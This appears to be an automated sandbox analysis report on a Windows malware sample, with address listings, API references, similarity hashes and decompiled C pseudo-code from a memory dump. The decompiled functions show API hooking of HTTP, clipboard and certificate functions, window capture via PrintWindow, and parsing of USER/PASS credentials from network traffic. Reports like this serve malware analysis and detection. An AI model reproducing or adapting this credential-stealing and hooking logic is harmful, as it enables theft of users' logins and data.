0x00417abd
0x00417ac5
0x00417ab1
0x00417ab1
0x00417ab1
0x00417acc
0x00417acd
0x00417ad2
0x00417ad7
0x00417ad9
0x00417adb
0x00417add
0x00417add
0x00417adf
0x00417ae2
0x00417ae5
0x00417ae7
0x00417aea
0x00417aec
0x00417aee
0x00417af1
0x00417af3
0x00417af3
0x00417af1
0x00417af8
0x00417af9
0x00417b0b
0x00417b10
0x00417b18
0x00417b1e
0x00417b23
0x00417b26
0x00417b28
0x00417b28
0x00417b28
0x00417b28
0x00417b2c
0x00417b30
0x00417b37
0x00417b38
0x00417b60
0x00417b60
0x00417b65
0x00417b69
0x00417b70
0x00417b71
0x00417b99
0x00417b99
0x00417b9e
0x00417ba2
0x00417ba9
0x00417baa
0x00417bd2
0x00417bd2
0x00417bd7
0x00417bda
0x00417bda
0x00417bda
0x00417a5a
0x00417bdc
0x00417be2
0x00417be2
0x00417bfa
0x00417c00
0x00000000
0x00417c00
0x004179fc
0x00417a01
0x00000000
0x00417a03
0x00417a03
0x00000000
0x00417a03

APIs

CoCreateInstance.OLE32(00404ABC,00000000,00004401,00404ACC,?,?,00000000,00000001), ref: 004179F2

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: e9231f990a0d38528c8f63471a491936886547dabb3515d3d0916d53daded057
Instruction ID: 8ffe14049b0c5047ac1320087e785ef065bdfe1f7accef1795f4c23a7f8bf0c6
Opcode Fuzzy Hash: e9231f990a0d38528c8f63471a491936886547dabb3515d3d0916d53daded057
Instruction Fuzzy Hash: 1E61A071A44219AFDB10DBA4CC84EEFBBB8EF44344F14456AFA11F7281D7789E808B54

Uniqueness

Uniqueness Score: -1.00%

Function 00414047, Relevance: 1.6, APIs: 1, Instructions: 81
networkCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00414047(intOrPtr _a4) {
				char _v262;
				char _v276;
				signed char _v277;
				signed char _v278;
				signed int _v279;
				void* __esi;
				signed int _t16;
				void* _t25;
				void* _t26;
				void* _t34;
				signed char _t38;
				void* _t39;

				_t40 = _a4;
				_t12 =  &_v262;
				__imp__#16(_a4, _t12, 1, 0, _t34, _t39, _t26);
				if(_t12 == 1) {
					_t16 = _v278 & 0x000000ff;
					if(_t16 == 0) {
						_t12 = E0040F175(1, _t40,  &_v277, 0);
						__eflags = _t12;
						if(_t12 != 0) {
							_t12 = E0040F175(1, _t40,  &_v279, 0);
							__eflags = _t12;
							if(_t12 != 0) {
								__eflags = _v279;
								if(_v279 > 0) {
									_t12 = E0040F175(_v279 & 0x000000ff, _t40,  &_v276, 0);
									__eflags = _t12;
									if(_t12 != 0) {
										_t38 = E0040C402(_v279 & 0x000000ff, 0xfde9,  &_v276);
										__eflags = _t38;
										if(_t38 != 0) {
											E0040C0B2(_t40, _t38, _v277 & 0x000000ff);
											_t12 = E0040C1C2(_t38);
										}
									}
								}
							}
						}
					} else {
						_t25 = _t16 - 4;
						if(_t25 == 0) {
							_t12 = E0041C01D(__eflags, _t40);
						} else {
							_t12 = _t25 == 1;
							_t48 = _t25 == 1;
							if(_t25 == 1) {
								_t12 = E0041B6D6(_t48, _t40);
							}
						}
					}
				}
				E0040F565(_t12, _t40);
				return 0;
			}

0x00414055
0x00414060
0x00414066
0x0041406e
0x00414079
0x0041407b
0x0041409f
0x004140a4
0x004140a6
0x004140b2
0x004140b7
0x004140b9
0x004140bb
0x004140bf
0x004140ce
0x004140d3
0x004140d5
0x004140eb
0x004140ed
0x004140ef
0x004140f9
0x004140ff
0x004140ff
0x004140ef
0x004140d5
0x004140bf
0x004140b9
0x0041407d
0x0041407d
0x00414080
0x0041408e
0x00414082
0x00414082
0x00414082
0x00414083
0x00414086
0x00414086
0x00414083
0x00414080
0x0041407b
0x00414104
0x00414111

APIs

recv.WS2_32(?,?,00000001,00000000), ref: 00414066

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 167cebee79af97f04047f2083a64877ce5c996b7aa2fb2916f637e7ed6806fdf
Instruction ID: dfa7a26171523ffcae46a5f64800978abd722848b1ec65008e99a206eea8d369
Opcode Fuzzy Hash: 167cebee79af97f04047f2083a64877ce5c996b7aa2fb2916f637e7ed6806fdf
Instruction Fuzzy Hash: 4A1127B21482617A8621EAAA4CC5CFF769E4ED6318F08043FF581D7181D92CCDC9866F

Uniqueness

Uniqueness Score: -1.00%

Function 0040994D, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040994D(signed short* __eax, void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int* _t7;
				void* _t8;
				signed short* _t9;
				signed int _t10;
				signed int _t13;
				signed short _t14;
				void* _t15;

				_t16 = __eax;
				_t7 =  &_v8;
				_v8 = 0x104;
				__imp__GetUserNameExW(2, __eax, _t7, _t15, __ecx);
				if(_t7 == 0) {
					L8:
					_t8 = 6;
					_t9 = E004128DB(_t8, _t16);
				} else {
					_t10 = _v8;
					if(_t10 == 0) {
						goto L8;
					} else {
						 *((short*)(__eax + _t10 * 2)) = 0;
						_t9 = __eax;
						if( *((intOrPtr*)(__eax)) != 0) {
							do {
								_t13 =  *_t9 & 0x0000ffff;
								if(_t13 == 0x2f || _t13 == 0x5c) {
									_t14 = 0x7c;
									 *_t9 = _t14;
								}
								_t9 =  &(_t9[1]);
							} while ( *_t9 != 0);
						}
					}
				}
				return _t9;
			}

0x00409952
0x00409954
0x0040995b
0x00409962
0x0040996a
0x0040999e
0x004099a0
0x004099a1
0x0040996c
0x0040996c
0x00409971
0x00000000
0x00409973
0x00409975
0x00409979
0x0040997e
0x00409980
0x00409980
0x00409986
0x0040998f
0x00409990
0x00409990
0x00409993
0x00409996
0x0040999c
0x0040997e
0x00409971
0x004099a8

APIs

GetUserNameExW.SECUR32(00000002,?,?), ref: 00409962

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: da8e6736aca2f2070ccf50143c679bd0048df104ab54c46bccaec459d7b7cce1
Instruction ID: 4bc8c11d7991164f51256c01b97e6abb39ad0d8046086a2cb47a20b82d78e005
Opcode Fuzzy Hash: da8e6736aca2f2070ccf50143c679bd0048df104ab54c46bccaec459d7b7cce1
Instruction Fuzzy Hash: 08F0F6A1614200AADB345B58D802AAB73A8DF05750F14006FE445EB3D1E2B88D80C359

Uniqueness

Uniqueness Score: -1.00%

Function 0041D43B, Relevance: .1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0041D43B() {
				void* __ebx;
				char _t1;
				signed int _t55;
				void* _t57;
				void* _t58;

				_t1 =  *0x4238c4;
				if(_t1 == 0) {
					_t1 =  *0x4238c0;
					 *0x42200c = E00414453;
				} else {
					 *0x42200c = E0041450A;
				}
				E00422008 = _t1;
				 *0x422018 =  *0x4238d0;
				 *0x422028 = GetFileAttributesExW;
				 *0x422038 = HttpSendRequestW;
				 *0x422048 = HttpSendRequestA;
				 *0x422058 = HttpSendRequestExW;
				 *0x422068 = HttpSendRequestExA;
				 *0x422078 = InternetCloseHandle;
				 *0x422088 = InternetReadFile;
				 *0x422098 = __imp__InternetReadFileExA;
				 *0x4220a8 = InternetQueryDataAvailable;
				 *0x4220b8 = HttpQueryInfoA;
				 *0x4220c8 = __imp__#3;
				 *0x4220d8 = __imp__#19;
				 *0x4220e8 = __imp__WSASend;
				 *0x4220f8 = OpenInputDesktop;
				 *0x422108 = SwitchDesktop;
				 *0x422118 = DefWindowProcW;
				 *0x422128 = DefWindowProcA;
				 *0x422138 = DefDlgProcW;
				 *0x422148 = DefDlgProcA;
				 *0x422158 = DefFrameProcW;
				 *0x422168 = DefFrameProcA;
				 *0x422178 = DefMDIChildProcW;
				 *0x422188 = DefMDIChildProcA;
				 *0x422198 = CallWindowProcW;
				 *0x4221a8 = CallWindowProcA;
				 *0x4221b8 = RegisterClassW;
				 *0x4221c8 = RegisterClassA;
				 *0x4221d8 = RegisterClassExW;
				 *0x4221e8 = RegisterClassExA;
				 *0x4221f8 = BeginPaint;
				 *0x422208 = EndPaint;
				 *0x422218 = GetDCEx;
				 *0x422228 = GetDC;
				 *0x422238 = GetWindowDC;
				 *0x422248 = ReleaseDC;
				 *0x422258 = GetUpdateRect;
				 *0x422268 = GetUpdateRgn;
				 *0x422278 = GetMessagePos;
				 *0x422288 = GetCursorPos;
				 *0x422298 = SetCursorPos;
				 *0x4222a8 = SetCapture;
				 *0x4222b8 = ReleaseCapture;
				 *0x4222c8 = GetCapture;
				 *0x4222d8 = GetMessageW;
				 *0x4222e8 = GetMessageA;
				 *0x4222f8 = PeekMessageW;
				 *0x422308 = PeekMessageA;
				 *0x422318 = TranslateMessage;
				_push( &E00422008);
				 *0x422328 = GetClipboardData;
				_t55 = 0x34;
				 *0x422338 = __imp__PFXImportCertStore;
				return E0041D3AA(_t55, _t57, _t58);
			}

0x0041d43b
0x0041d442
0x0041d450
0x0041d455
0x0041d444
0x0041d444
0x0041d444
0x0041d45f
0x0041d469
0x0041d473
0x0041d47d
0x0041d487
0x0041d491
0x0041d49b
0x0041d4a5
0x0041d4af
0x0041d4b9
0x0041d4c3
0x0041d4cd
0x0041d4d7
0x0041d4e1
0x0041d4eb
0x0041d4f5
0x0041d4ff
0x0041d509
0x0041d513
0x0041d51d
0x0041d527
0x0041d531
0x0041d53b
0x0041d545
0x0041d54f
0x0041d559
0x0041d563
0x0041d56d
0x0041d577
0x0041d581
0x0041d58b
0x0041d595
0x0041d59f
0x0041d5a9
0x0041d5b3
0x0041d5bd
0x0041d5c7
0x0041d5d1
0x0041d5db
0x0041d5e5
0x0041d5f0
0x0041d5fa
0x0041d604
0x0041d60e
0x0041d618
0x0041d622
0x0041d62c
0x0041d636
0x0041d640
0x0041d64a
0x0041d654
0x0041d659
0x0041d665
0x0041d666
0x0041d671

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 57aea5d502814d75d73c88a5753f460b1f3e871a90cf862b9f014f08a68f59fe
Instruction ID: 86a7ab6c9b463e2ab16bc7b9f912e4fa8c8d04fd609e19a462f16b9ebbf6115f
Opcode Fuzzy Hash: 57aea5d502814d75d73c88a5753f460b1f3e871a90cf862b9f014f08a68f59fe
Instruction Fuzzy Hash: C161CDB8A00241EFD3A0CF68FEC0A5177E0B3487547E1417AE918E7731E2B5A996DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 004129EB, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction ID: d74da45686cf666c48bd23fce6d1f5c88108d18a63310ac2dc556d4b474febc0
Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction Fuzzy Hash: C7E0267B3000108BC750CE15E580983B7A2FBCC730B1282A5C815C7305C938EDC3C5D5

Uniqueness

Uniqueness Score: -1.00%

Function 0040A496, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040A496(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
				char _v9;
				signed int _v10;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* _v68;
				signed int _v72;
				int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				struct HDC__* _v96;
				struct HWND__* _v100;
				void _v104;
				intOrPtr _v140;
				intOrPtr _v156;
				struct tagWINDOWINFO _v164;
				signed int _t128;
				signed int _t135;
				void* _t140;
				void* _t146;
				signed int _t164;
				intOrPtr _t191;
				long _t192;
				intOrPtr _t195;
				long _t196;
				long _t210;
				long _t211;
				long _t212;
				long _t213;
				signed int _t214;
				signed int _t215;
				RECT* _t216;
				struct HDC__* _t217;
				struct HDC__* _t221;

				_t214 = __edx;
				_t216 = __eax;
				_t128 = E00416709(_a8) & 0x0000ffff;
				_v16 = _t128;
				if((_t128 & 0x00000001) == 0) {
					if(_t128 == 0) {
						_v16 = 2;
						_t128 = _v16;
					}
					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
						_v16 = _t128 & 0x0000fffd | 0x00000008;
					}
					_v24 = 0;
					_v20 = 0;
					_v28 = 0;
					_v32 = 0;
					_v164.cbSize = 0x3c;
					if(GetWindowInfo(_a8,  &_v164) != 0) {
						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
						_v10 = _t215;
						if(_t215 != 0) {
							_t212 = _t216->top;
							_t195 = _v156;
							if(_t195 < _t212) {
								_v20 = _t195 - _t212;
							}
							_t213 = _t216->left;
							_t196 = _v164.rcWindow.left;
							if(_t196 < _t213) {
								_v24 = _t196 - _t213;
							}
						}
						_t135 = _v16 & 0x00000002;
						_v72 = _t135;
						if(_t135 == 0) {
							_a15 = _t215;
						} else {
							if((_v164.dwStyle & 0x20000000) == 0) {
								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
								if(_a15 != 0) {
									_t210 = _t216->top;
									_t191 = _v140;
									if(_t191 < _t210) {
										_v32 = _t191 - _t210;
									}
									_t211 = _t216->left;
									_t192 = _v164.rcClient.left;
									if(_t192 < _t211) {
										_v28 = _t192 - _t211;
									}
								}
							} else {
								_a15 = 0;
							}
						}
						if(_v10 != 0 || _a15 != 0) {
							_t217 = GetDC(0);
							if(_t217 == 0) {
								goto L8;
							}
							_t221 = CreateCompatibleDC(_t217);
							ReleaseDC(0, _t217);
							if(_t221 == 0) {
								goto L8;
							}
							_t218 = _a4;
							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
							_v68 = _t140;
							if(_t140 != 0) {
								_v9 = 1;
								if(_v72 == 0) {
									if((_v16 & 0x00000004) == 0) {
										if((_v16 & 0x00000008) == 0) {
											L56:
											SelectObject(_t221, _v68);
											DeleteDC(_t221);
											return _v9;
										}
										if(_v24 != 0 || _v20 != 0) {
											SetViewportOrgEx(_t221, _v24, _v20, 0);
										}
										_t146 = E0040A3B4(_t218,  &_v64, 0);
										__imp__PrintWindow(_a8, _t221, 0);
										if(_t146 != 0) {
											L55:
											E0040A3B4(_t218,  &_v64, 1);
										} else {
											_v9 = 0;
										}
										goto L56;
									}
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E0040A3B4(_t218,  &_v64, 0);
									DefWindowProcW(_a8, 0x317, _t221, 0xe);
									goto L55;
								}
								_v100 = _a8;
								_v96 = _t221;
								_v84 = _v48.right - _v48.left;
								_v76 = 1;
								_v80 = _v48.bottom - _v48.top;
								_v92 = 0;
								_v88 = 0;
								TlsSetValue( *0x423e84,  &_v104);
								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
									_v16 = SaveDC(_t221);
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E0040A3B4(_a4,  &_v64, 0);
									_v104 = 0;
									SendMessageW(_a8, 0x85, 1, 0);
									if(_v104 == 0) {
										DefWindowProcW(_a8, 0x317, _t221, 2);
									}
									E0040A3B4(_a4,  &_v64, 1);
									RestoreDC(_t221, _v16);
								}
								if(_a15 != 1) {
									L49:
									TlsSetValue( *0x423e84, 0);
									goto L56;
								} else {
									if(_v28 != 0) {
										L41:
										_a15 = 1;
										L42:
										_v16 = SaveDC(_t221);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										E0040A3B4(_a4,  &_v48, 0);
										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
										asm("sbb eax, eax");
										_v76 =  ~_t164 + 1;
										RestoreDC(_t221, _v16);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										_v104 = 0;
										SendMessageW(_a8, 0xf, 0, 0);
										if(_v104 == 0) {
											DefWindowProcW(_a8, 0x317, _t221, 4);
										}
										E0040A3B4(_a4,  &_v48, 1);
										goto L49;
									}
									_a15 = 0;
									if(_v32 == 0) {
										goto L42;
									}
									goto L41;
								}
							}
							DeleteDC(_t221);
							goto L8;
						} else {
							goto L1;
						}
					}
					L8:
					return 0;
				}
				L1:
				return 1;
			}

0x0040a496
0x0040a4a5
0x0040a4ac
0x0040a4af
0x0040a4b4
0x0040a4c2
0x0040a4c4
0x0040a4cb
0x0040a4cb
0x0040a4d1
0x0040a4df
0x0040a4df
0x0040a4ec
0x0040a4ef
0x0040a4f2
0x0040a4f5
0x0040a4f8
0x0040a50a
0x0040a529
0x0040a52c
0x0040a531
0x0040a533
0x0040a536
0x0040a53e
0x0040a542
0x0040a542
0x0040a545
0x0040a547
0x0040a54f
0x0040a553
0x0040a553
0x0040a54f
0x0040a559
0x0040a55c
0x0040a55f
0x0040a5ad
0x0040a561
0x0040a568
0x0040a57f
0x0040a586
0x0040a588
0x0040a58b
0x0040a593
0x0040a597
0x0040a597
0x0040a59a
0x0040a59c
0x0040a5a4
0x0040a5a8
0x0040a5a8
0x0040a5a4
0x0040a56a
0x0040a56a
0x0040a56a
0x0040a568
0x0040a5b3
0x0040a5c5
0x0040a5c9
0x00000000
0x00000000
0x0040a5d8
0x0040a5da
0x0040a5e2
0x00000000
0x00000000
0x0040a5e8
0x0040a5ef
0x0040a5f5
0x0040a5fa
0x0040a608
0x0040a610
0x0040a78b
0x0040a7ec
0x0040a7cd
0x0040a7d1
0x0040a7d8
0x00000000
0x0040a7de
0x0040a7f1
0x0040a800
0x0040a800
0x0040a80c
0x0040a816
0x0040a81e
0x0040a7c1
0x0040a7c8
0x0040a820
0x0040a820
0x0040a820
0x00000000
0x0040a81e
0x0040a790
0x0040a79f
0x0040a79f
0x0040a7ab
0x0040a7bb
0x00000000
0x0040a7bb
0x0040a619
0x0040a622
0x0040a625
0x0040a62e
0x0040a635
0x0040a642
0x0040a645
0x0040a648
0x0040a658
0x0040a673
0x0040a679
0x0040a688
0x0040a688
0x0040a695
0x0040a6a5
0x0040a6a8
0x0040a6ad
0x0040a6ba
0x0040a6ba
0x0040a6c8
0x0040a6d1
0x0040a6d1
0x0040a6db
0x0040a778
0x0040a77f
0x00000000
0x0040a6e1
0x0040a6e4
0x0040a6ee
0x0040a6ee
0x0040a6f2
0x0040a6f9
0x0040a6ff
0x0040a709
0x0040a709
0x0040a716
0x0040a722
0x0040a729
0x0040a72d
0x0040a730
0x0040a739
0x0040a743
0x0040a743
0x0040a750
0x0040a753
0x0040a758
0x0040a765
0x0040a765
0x0040a773
0x00000000
0x0040a773
0x0040a6e6
0x0040a6ec
0x00000000
0x00000000
0x00000000
0x0040a6ec
0x0040a6db
0x0040a5fd
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a5b3
0x0040a50c
0x00000000
0x0040a50c
0x0040a4b6
0x00000000

APIs

Part of subcall function 00416709: GetClassNameW.USER32 ref: 00416724

GetWindowInfo.USER32 ref: 0040A502
SelectObject.GDI32(00000000,?), ref: 0040A7D1
DeleteDC.GDI32(00000000), ref: 0040A7D8
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0040A800
PrintWindow.USER32(00000008,00000000,00000000,00000000), ref: 0040A816

Strings

<, xrefs: 0040A4F8

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
String ID: <
API String ID: 3458064076-4251816714
Opcode ID: 5d7dc8d5aaed9a69c4d6063f18916d3bf0a4d0ea39f783a1c221537f07865be3
Instruction ID: 96616ccf789ac8e5f9cdfed5ca9373da9a56e589fe823fafd9d4f5e1208f42b9
Opcode Fuzzy Hash: 5d7dc8d5aaed9a69c4d6063f18916d3bf0a4d0ea39f783a1c221537f07865be3
Instruction Fuzzy Hash: F6C16D71D00249AFDF219FA4CD44AEEBBB9BF04304F04803AF955B72A0D7398A54DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040962D, Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040962D(void* __eax, signed int* __ecx, signed int __edx, intOrPtr _a4) {
				char _v536;
				char _v652;
				char _v664;
				char _v696;
				char _v700;
				char _v701;
				char _v708;
				void* __esi;
				char* _t35;
				void* _t40;
				char* _t43;
				intOrPtr _t44;
				void* _t47;
				void* _t54;
				void* _t56;
				intOrPtr _t57;
				signed int _t58;
				signed int _t60;
				void* _t61;
				signed int* _t71;
				intOrPtr _t73;
				signed int _t75;
				signed char _t76;
				intOrPtr _t79;
				signed int _t80;
				intOrPtr _t83;
				signed int* _t84;
				intOrPtr _t85;
				void* _t87;
				char* _t92;
				void* _t93;
				intOrPtr* _t94;

				_t80 = __edx;
				_t87 = __eax;
				_t71 = __ecx;
				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
					L51:
					_t35 = 0;
					__eflags = 0;
				} else {
					if(__eax <= 6) {
						L24:
						__eflags = _t87 - 1;
						if(_t87 <= 1) {
							goto L51;
						} else {
							EnterCriticalSection(0x422878);
							_t83 = E00409525(_a4);
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags =  *((intOrPtr*)(_t83 + 4));
								if( *((intOrPtr*)(_t83 + 4)) == 0) {
									L48:
									_push(0);
									goto L49;
								} else {
									__eflags =  *((intOrPtr*)(_t83 + 8));
									if( *((intOrPtr*)(_t83 + 8)) == 0) {
										goto L48;
									} else {
										__eflags = _t87 - 3;
										if(_t87 < 3) {
											L33:
											__eflags = _t87 - 4;
											if(_t87 >= 4) {
												_t75 =  *_t71 ^ 0x04000001;
												__eflags = _t75 - 0x41505955;
												if(_t75 == 0x41505955) {
													goto L37;
												} else {
													__eflags = _t75 - 0x50414547;
													if(_t75 == 0x50414547) {
														goto L37;
													} else {
														__eflags = _t75 - 0x52534151;
														if(_t75 != 0x52534151) {
															__eflags = _t75 - 0x50415452;
															if(_t75 == 0x50415452) {
																L40:
																_t76 = 0x65;
																_push(0x15);
																goto L41;
															} else {
																__eflags = _t75 - 0x5053494d;
																if(_t75 == 0x5053494d) {
																	goto L40;
																}
															}
														} else {
															goto L37;
														}
													}
												}
											}
										} else {
											_t58 =  *_t71;
											__eflags = _t58 - 0x43;
											if(_t58 == 0x43) {
												L31:
												__eflags = _t71[0] - 0x57;
												if(_t71[0] != 0x57) {
													goto L33;
												} else {
													__eflags = _t71[0] - 0x44;
													if(_t71[0] == 0x44) {
														L37:
														_t76 = 0x64;
														_push(0x14);
														L41:
														_pop(_t40);
														E004128DB(_t40,  &_v696);
														_t43 =  &_v652;
														_v700 = 0x80;
														__imp__#5(_a4, _t43,  &_v700);
														__eflags = _t43;
														if(_t43 == 0) {
															_t78 =  &_v664;
															_t44 = E0040F66C( &_v664);
															__eflags = _t44;
															if(_t44 == 0) {
																__eflags = _t76 - 0x65;
																if(_t76 == 0x65) {
																	L46:
																	E0040F623( &_v664, _t78,  &_v536);
																	_t47 = 0x13;
																	E004128DB(_t47,  &_v696);
																	_push( &_v536);
																	_push( *((intOrPtr*)(_t83 + 8)));
																	_push( *((intOrPtr*)(_t83 + 4)));
																	E00409404(_t78, _t80, __eflags, _t76 & 0x000000ff, 0, 0,  &_v696,  &_v708);
																} else {
																	__eflags = _t76 - 0x64;
																	if(_t76 == 0x64) {
																		_t92 =  &_v696;
																		_t54 = 0x16;
																		E004128DB(_t54, _t92);
																		_push( *((intOrPtr*)(_t83 + 4)));
																		_t80 = _t80 | 0xffffffff;
																		_t56 = 9;
																		_t78 = _t92;
																		_t57 = E0040CDD2(_t56, _t92, _t80);
																		__eflags = _t57;
																		if(_t57 != 0) {
																			goto L46;
																		}
																	}
																}
															}
														}
														_push(0);
														L49:
														E004095C4(_t83);
													} else {
														goto L33;
													}
												}
											} else {
												__eflags = _t58 - 0x50;
												if(_t58 != 0x50) {
													goto L33;
												} else {
													goto L31;
												}
											}
										}
									}
								}
							}
							_t73 = 0;
							goto L23;
						}
					} else {
						_t60 =  *__ecx ^ 0x04000001;
						if(_t60 == 0x56455354 || _t60 == 0x57534151) {
							if(_t71[1] != 0x20) {
								goto L24;
							} else {
								_t61 = 0;
								_t93 = _t87 + 0xfffffffb;
								_t84 =  &(_t71[1]);
								if(_t93 == 0) {
									goto L51;
								} else {
									while(1) {
										_t79 =  *((intOrPtr*)(_t61 + _t84));
										if(_t79 == 0xd || _t79 == 0xa) {
											break;
										}
										if(_t79 < 0x20) {
											goto L51;
										} else {
											_t61 = _t61 + 1;
											if(_t61 < _t93) {
												continue;
											} else {
												break;
											}
										}
										goto L52;
									}
									if(_t61 == 0 || _t61 == _t93) {
										goto L51;
									} else {
										_t85 = E0040C402(_t61, 0xfde9, _t84);
										if(_t85 == 0) {
											goto L51;
										} else {
											_v701 = 0;
											EnterCriticalSection(0x422878);
											_t94 = E00409525(_a4);
											if(_t94 != 0) {
												L18:
												__eflags =  *_t71 - 0x55;
												_v701 = 1;
												if( *_t71 != 0x55) {
													E0040C1C2( *((intOrPtr*)(_t94 + 8)));
													 *((intOrPtr*)(_t94 + 8)) = _t85;
												} else {
													E004095C4(_t94, 1);
													 *((intOrPtr*)(_t94 + 4)) = _t85;
												}
												 *_t94 = _a4;
											} else {
												_t94 = E0040955E(_a4);
												if(_t94 != 0) {
													goto L18;
												} else {
													E0040C1C2(_t85);
												}
											}
											_t73 = _v701;
											L23:
											LeaveCriticalSection(0x422878);
											_t35 = _t73;
										}
									}
								}
							}
						} else {
							goto L24;
						}
					}
				}
				L52:
				return _t35;
			}

0x0040962d
0x00409640
0x00409642
0x00409644
0x0040989b
0x0040989b
0x0040989b
0x0040965e
0x00409661
0x0040974a
0x0040974a
0x0040974d
0x00000000
0x00409753
0x00409758
0x00409766
0x0040976a
0x0040976c
0x00409772
0x00409775
0x0040988c
0x0040988c
0x00000000
0x0040977b
0x0040977b
0x0040977e
0x00000000
0x00409784
0x00409784
0x00409787
0x0040979f
0x0040979f
0x004097a2
0x004097aa
0x004097b0
0x004097b6
0x00000000
0x004097b8
0x004097b8
0x004097be
0x00000000
0x004097c0
0x004097c0
0x004097c6
0x004097ce
0x004097d4
0x004097e2
0x004097e2
0x004097e4
0x00000000
0x004097d6
0x004097d6
0x004097dc
0x00000000
0x00000000
0x004097dc
0x00000000
0x00000000
0x00000000
0x004097c6
0x004097be
0x004097b6
0x00409789
0x00409789
0x0040978b
0x0040978d
0x00409793
0x00409793
0x00409797
0x00000000
0x00409799
0x00409799
0x0040979d
0x004097c8
0x004097c8
0x004097ca
0x004097e6
0x004097ea
0x004097eb
0x004097f5
0x004097fd
0x00409805
0x0040980b
0x0040980d
0x0040980f
0x00409813
0x00409818
0x0040981a
0x0040981c
0x0040981f
0x00409846
0x00409851
0x0040985c
0x0040985d
0x00409869
0x0040986a
0x00409871
0x00409880
0x00409821
0x00409821
0x00409824
0x00409828
0x0040982c
0x0040982d
0x00409832
0x00409835
0x0040983a
0x0040983b
0x0040983d
0x00409842
0x00409844
0x00000000
0x00000000
0x00409844
0x00409824
0x0040981f
0x0040981a
0x00409888
0x0040988d
0x0040988f
0x00000000
0x00000000
0x00000000
0x0040979d
0x0040978f
0x0040978f
0x00409791
0x00000000
0x00000000
0x00000000
0x00000000
0x00409791
0x0040978d
0x00409787
0x0040977e
0x00409775
0x00409894
0x00000000
0x00409894
0x00409667
0x00409669
0x00409673
0x00409684
0x00000000
0x0040968a
0x0040968a
0x0040968c
0x0040968f
0x00409692
0x00000000
0x00409698
0x00409698
0x00409698
0x0040969e
0x00000000
0x00000000
0x004096a8
0x00000000
0x004096ae
0x004096ae
0x004096b1
0x00000000
0x00000000
0x00000000
0x00000000
0x004096b1
0x00000000
0x004096a8
0x004096b5
0x00000000
0x004096c3
0x004096ce
0x004096d2
0x00000000
0x004096d8
0x004096dd
0x004096e2
0x004096f0
0x004096f4
0x0040970c
0x0040970c
0x0040970f
0x00409714
0x00409727
0x0040972c
0x00409716
0x0040971a
0x0040971f
0x0040971f
0x00409732
0x004096f6
0x004096fe
0x00409702
0x00000000
0x00409704
0x00409705
0x00409705
0x00409702
0x00409734
0x00409738
0x0040973d
0x00409743
0x00409743
0x004096d2
0x004096b5
0x00409692
0x00000000
0x00000000
0x00000000
0x00409673
0x00409661
0x0040989d
0x004098a3

APIs

EnterCriticalSection.KERNEL32(00422878,0000FDE9,?), ref: 004096E2
LeaveCriticalSection.KERNEL32(00422878,?,000000FF), ref: 0040973D
EnterCriticalSection.KERNEL32(00422878), ref: 00409758
